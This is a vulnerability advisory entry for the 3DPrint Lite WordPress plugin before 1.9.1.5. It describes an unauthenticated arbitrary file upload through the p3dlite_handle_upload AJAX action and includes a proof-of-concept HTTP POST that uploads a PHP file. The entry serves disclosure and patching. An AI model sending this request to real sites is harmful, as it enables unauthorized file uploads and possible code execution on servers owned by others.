WordPress Plugin Vulnerabilities
3DPrint Lite < 1.9.1.5 - Unauthenticated Arbitrary File Upload
Description
The plugin does not have any authorisation and does not check the uploaded file in its p3dlite_handle_upload AJAX action , allowing unauthenticated users to upload arbitrary file to the web server. However, there is a .htaccess, preventing the file to be accessed on Web servers such as Apache.
Proof of Concept
POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------54331109111293931601238262353 Content-Length: 366 Connection: close Upgrade-Insecure-Requests: 1 -----------------------------54331109111293931601238262353 Content-Disposition: form-data; name="action" p3dlite_handle_upload -----------------------------54331109111293931601238262353 Content-Disposition: form-data; name="file"; filename="a.php" Content-Type: text/php <?php echo 'Failed'; ?> -----------------------------54331109111293931601238262353--
Affects Plugins
References
CVE
Exploitdb
Miscellaneous
Original Researcher
Spacehen
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-09-23 (about 2 years ago)
Added
2021-09-23 (about 2 years ago)
Last Updated
2024-02-05 (about 3 months ago)